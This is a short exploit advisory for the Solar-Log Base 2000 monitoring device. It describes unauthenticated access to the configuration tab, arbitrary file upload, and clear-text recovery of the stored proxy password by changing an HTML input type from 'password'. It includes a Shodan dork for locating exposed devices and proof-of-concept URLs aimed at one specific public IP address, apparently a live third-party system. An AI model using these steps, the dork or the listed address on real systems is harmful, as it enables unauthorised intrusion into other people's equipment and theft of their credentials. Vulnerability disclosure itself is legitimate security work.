# Exploit Title: Solar-Log Base 2000- Broken Access Control # Google Dork: In Shodan search engine, the filter is ""Server: IPC@CHIP"" "http.favicon.hash:-1334408578 "655744600"" # Date: 4/21/2024 # Exploit Author: parsa rezaie khiabanloo # Vendor Homepage: https://www.solar-log.com/en/ # Version: Solar-Log Base 2000 # Tested on: Windows/Linux # 1. Description: # An issue was discovered in Solar-Log Base 2000. # Attacker can use shodan dorks to find the devices then can go to the configuration tab without aunthentication . # In this Configuration tab can upload anyfile that want . # Attacker can set this path #ilang=EN&b=c_network_proxy to find proxies with password for grap password as clear that can use Inspect element then click on the password . # Change this input type value to clear <input type="password" id="i_prxpass" name="434" class="field SDSLF1"> <input type="clear" id="i_prxpass" name="434" class="field SDSLF1"> # 2. Proof of Concept (POC) : http://46.44.227.172:84/#ilang=EN&b=c_network_proxy http://46.44.227.172:84/#ilang=EN&b=c_data_initial